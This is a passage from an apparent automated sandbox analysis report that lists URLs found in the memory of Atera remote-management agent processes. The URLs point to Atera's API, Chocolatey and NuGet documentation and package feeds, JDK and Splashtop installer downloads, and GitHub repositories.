                                Source: AgentPackageMonitoring.exe, 00000025.00000002.2366809057.000001D722FDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/thresholds/ef8472c8-8ede-4877-a4a2-21e52a229933
                                Source: rundll32.exe, 00000004.00000002.1890578145.0000000005071000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.1890578145.0000000005114000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.2046712886.00000000044E7000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.2046712886.0000000004441000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000003B.00000002.2776825181.0000000004951000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000003B.00000002.2776825181.00000000049F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/track-event
                                Source: rundll32.exe, 00000004.00000002.1890578145.0000000005156000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.2046712886.0000000004526000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/track-event;
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE803B1000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE80477000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.comPT
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3153901428.000002C39BDFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ant.apache.org/
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3153901428.000002C39BDFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ant.apache.org/antnews.html
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3153901428.000002C39BDFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ant.apache.org/manual/index.html
                                Source: AgentPackageTicketing.exe, 00000032.00000002.3071249917.00000277DFEC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.nuHp
                                Source: AgentPackageTicketing.exe, 00000032.00000002.3071249917.00000277DFEC8000.00000004.00000800.00020000.00000000.sdmp, AgentPackageTicketing.exe, 00000032.00000002.3071249917.00000277DFE1F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.nuget.org
                                Source: AgentPackageTicketing.exe, 00000032.00000002.3071249917.00000277DFEC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.nuget.org/v3-flatcontainer/eo.webbrowser/24.1.46/eo.webbrowser.2
                                Source: AgentPackageTicketing.exe, 00000032.00000002.3071249917.00000277DFEC8000.00000004.00000800.00020000.00000000.sdmp, AgentPackageTicketing.exe, 00000032.00000002.3068186659.00000277DFBB2000.00000002.00000001.01000000.0000004A.sdmp, AgentPackageTicketing.exe, 00000032.00000002.3071249917.00000277DFE1F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.nuget.org/v3-flatcontainer/eo.webbrowser/24.1.46/eo.webbrowser.24.1.46.nupkg
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://bit.ly/1duJ9bM).
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://bit.ly/1g0R3Os).
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://bitbucket.org/jonforums/uru)
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3153901428.000002C39BDFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.jsdelivr.net/gh/dgalbraith/chocolatey-packages
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://ch0.co/moderation
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://ch0.co/nexus2apikey).
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://ch0.co/packages_config
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4D12000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://chocolatey.org).
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmp, AgentPackageProgramManagement.exe, 0000003C.00000002.3072832109.000002C38BD71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chocolatey.org/
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://chocolatey.org/9https://push.chocolatey.org/Chttps://community.chocolatey.org/Qhttps://commu
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4D12000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://chocolatey.org/compare
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://chocolatey.org/compare.
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://chocolatey.org/comparekThis
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4D12000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://chocolatey.org/contact.
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3072832109.000002C38BF5C000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 0000003C.00000002.3072832109.000002C38C3E6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 0000003C.00000002.3072832109.000002C38C428000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://community.chocolatey.org)
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3072832109.000002C38BF5C000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 0000003C.00000002.3072832109.000002C38BD71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmp, AgentPackageProgramManagement.exe, 0000003C.00000002.3072832109.000002C38C428000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/api/v2
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmp, AgentPackageProgramManagement.exe, 0000003C.00000002.3072832109.000002C38C0AE000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4D12000.00000002.00000001.01000000.0000004F.sdmp, AgentPackageProgramManagement.exe, 0000003C.00000002.3072832109.000002C38C0F9000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 0000003C.00000002.3072832109.000002C38C428000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 0000003C.00000002.3072832109.000002C38BD71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/api/v2/
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3072832109.000002C38BF5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/api/v2/$metadata
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3072832109.000002C38BF5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/api/v2/$metadata0
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://community.chocolatey.org/api/v2/.
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3072832109.000002C38C3B4000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 0000003C.00000002.3072832109.000002C38C3A3000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 0000003C.00000002.3072832109.000002C38C3E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/api/v2/X
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3153901428.000002C39BDFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/api/v2/package/Temurin11/11.0.25.9
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3153901428.000002C39BDFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/api/v2/package/ant/1.10.14
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3153901428.000002C39BDFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/package/ReportAbuse/Temurin11/11.0.25.9
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3153901428.000002C39BDFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/package/ReportAbuse/ant/1.10.14
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3072832109.000002C38C564000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4D12000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://community.chocolatey.org/packages)
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://community.chocolatey.org/packages).
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3153901428.000002C39BDFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/packages/Temurin11/11.0.25.9
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3153901428.000002C39BDFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/packages/ant/1.10.14
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://community.chocolatey.org/packages/autohotkey.portable
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4D12000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://community.chocolatey.org/packages/checksum)
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4D12000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://community.chocolatey.org/packages/checksum.
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://community.chocolatey.org/packages/chocolatey-core.extension
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://community.chocolatey.org/packages/pik)
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://community.chocolatey.org/packages?q=id%3A.extension
                                Source: AgentPackageOsUpdates.exe, 00000034.00000002.2789370388.000001FC4821A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dc.services.visualstudio.com
                                Source: AgentPackageOsUpdates.exe, 00000034.00000002.2824739173.000001FC60A02000.00000002.00000001.01000000.00000042.sdmpString found in binary or memory: https://dc.services.visualstudio.com/Jhttps://rt.services.visualstudio.com/Fhttps://profiler.monitor
                                Source: AgentPackageOsUpdates.exe, 00000034.00000002.2789370388.000001FC481AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dc.services.visualstudio.com/X
                                Source: AgentPackageOsUpdates.exe, 00000034.00000002.2824739173.000001FC60A02000.00000002.00000001.01000000.00000042.sdmpString found in binary or memory: https://dc.services.visualstudio.com/api/profiles/
                                Source: AgentPackageOsUpdates.exe, 00000034.00000002.2824739173.000001FC60A02000.00000002.00000001.01000000.00000042.sdmpString found in binary or memory: https://dc.services.visualstudio.com/f
                                Source: AgentPackageOsUpdates.exe, 00000034.00000002.2789370388.000001FC482B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dc.services.visualstudio.com/p
                                Source: AgentPackageOsUpdates.exe, 00000034.00000002.2789370388.000001FC4821A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dc.services.visualstudio.com/pcq
                                Source: AgentPackageOsUpdates.exe, 00000034.00000002.2789370388.000001FC4821A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dc.services.visualstudio.com/v2/track
                                Source: AgentPackageOsUpdates.exe, 00000034.00000002.2789370388.000001FC4821A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dc.services.visualstudio.com8
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/choco/commands/uninstall
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/choco/setup#non-administrative-install
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/community-repository/community-packages-disclaimer
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/community-repository/moderation/
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/create/automatic-packages
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/create/automatic-packages#automatic-updater-au
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4D12000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/create/automatic-packages)
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/create/create-packages
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/create/create-packages#how-do-i-exclude-executables-from-getting-s
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/create/create-packages#how-do-i-set-up-shims-for-applications-that
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/create/create-packages#package-icon-guidelines
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/create/functions
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/create/functions/get-chocolateyunzipp
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/create/functions/get-chocolateywebfile
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/create/functions/get-osarchitecturewidth
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/create/functions/get-toolslocation
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/create/functions/install-binfile
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/create/functions/install-chocolateyenvironmentvariable
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/create/functions/install-chocolateyfileassociation
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/create/functions/install-chocolateyinstallpackage
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/create/functions/install-chocolateypackage
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/create/functions/install-chocolateypath
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/create/functions/install-chocolateyshortcut
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/create/functions/install-chocolateyvsixpackage
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/create/functions/install-chocolateyzippackage
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/create/functions/start-chocolateyprocessasadmin
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/create/functions/uninstall-binfile
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/create/functions/uninstall-chocolateyenvironmentvariable
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/create/functions/uninstall-chocolateypackage
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/create/functions/uninstall-chocolateyzippackage
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/features/extensions
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4D12000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/features/private-cdn.
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/getting-started#overriding-default-install-directory-or-other-adva
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/guides/create/create-custom-package-templates
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/guides/create/mount-an-iso-in-chocolatey-package
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4D12000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/guides/create/parse-packageparameters-argument
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3072832109.000002C38C564000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4D12000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/guides/create/parse-packageparameters-argument#step-3---use-core-c
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/information/legal.
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://docs.chocolatey.org/en-us/troubleshooting
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://docs.nuget.org/create/Nuspec-Reference.
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://docs.nuget.org/create/versioning#creating-prerelease-packages
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://docs.nuget.org/create/versioning#specifying-version-ranges-in-.nuspec-files
                                Source: AgentPackageSTRemote.exe, 00000023.00000002.3066742035.0000015421787000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://download.splashtop.com
                                Source: AgentPackageSTRemote.exe, 00000023.00000002.3066742035.0000015421787000.00000004.00000800.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000023.00000002.3066742035.0000015421762000.00000004.00000800.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000023.00000002.3066742035.0000015421783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://download.splashtop.com/csrs/Splashtop_Streamer_Win_DEPLOY_INSTALLER_v3.7.2.4.exe
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3072832109.000002C38BF58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gist.github.com/choco-bot/3c28608c3d3a428a951334d79c38c4c2
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3153901428.000002C39BDFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gist.github.com/choco-bot/61fb53d591dd9c28aac20a49ea6767e5
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3153901428.000002C39BDFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitbox.apache.org/repos/asf/ant.git
                                Source: AgentPackageOsUpdates.exe, 00000034.00000002.2818037392.000001FC60622000.00000002.00000001.01000000.0000003F.sdmpString found in binary or memory: https://github.com/App-vNext/Polly.git
                                Source: rundll32.exe, 00000003.00000003.1834753750.0000000004881000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1844449479.0000000004E1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1895265835.0000000004E3C000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE80647000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE8028C000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1990755362.00000000042D4000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000015.00000002.2188590383.00000280D3882000.00000002.00000001.01000000.00000019.sdmp, AgentPackageMonitoring.exe, 00000025.00000002.2378477877.000001D73B962000.00000002.00000001.01000000.00000024.sdmp, AgentPackageUpgradeAgent.exe, 00000030.00000002.2631969820.00000235BA360000.00000002.00000001.01000000.0000002A.sdmp, rundll32.exe, 00000038.00000003.2676474394.0000000004CE0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003B.00000003.2688648705.000000000449E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/JamesNK/Newtonsoft.Json
                                Source: AgentPackageOsUpdates.exe, 00000034.00000002.2824739173.000001FC60A02000.00000002.00000001.01000000.00000042.sdmp, AgentPackageOsUpdates.exe, 00000034.00000002.2789370388.000001FC480FE000.00000004.00000800.00020000.00000000.sdmp, AgentPackageOsUpdates.exe, 00000034.00000002.2789370388.000001FC482B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Microsoft/ApplicationInsights-dotnet
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3153901428.000002C39BDFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/adoptium/jdk11u/blob/master/LICENSE
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3153901428.000002C39BDFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/adoptium/temurin11-binaries/releases/download/jdk-11.0.24%2B8/OpenJDK11U-jdk_x86-
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3153901428.000002C39BDFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/adoptium/temurin11-binaries/releases/download/jdk-11.0.25%2B9/OpenJDK11U-jdk_x64_
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3153901428.000002C39BDFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/ajshastri/chocolatey-packages
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://github.com/chocolatey/choco/blob/bfe351b7d10c798014efe4bfbb100b171db25099/src/chocolatey/inf
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4D12000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://github.com/chocolatey/choco/issues/1800#issuecomment-484293844.
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://github.com/chocolatey/choco/issues/new/choose.
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3072832109.000002C38C44A000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 0000003C.00000002.3072832109.000002C38C460000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4D12000.00000002.00000001.01000000.0000004F.sdmp, AgentPackageProgramManagement.exe, 0000003C.00000002.3072832109.000002C38C50D000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 0000003C.00000002.3072832109.000002C38C48B000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 0000003C.00000002.3072832109.000002C38C475000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 0000003C.00000002.3072832109.000002C38C523000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 0000003C.00000002.3072832109.000002C38C428000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/chocolatey/chocolatey
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3072832109.000002C38C564000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4D12000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://github.com/chocolatey/chocolatey-coreteampackages
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://github.com/chocolatey/chocolatey-test-environment
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://github.com/chocolatey/chocolatey-workshop
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4D12000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://github.com/chocolatey/shimgen/tree/master/shim.
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3072832109.000002C38C4E1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4D12000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://github.com/dahlbyk/posh-git
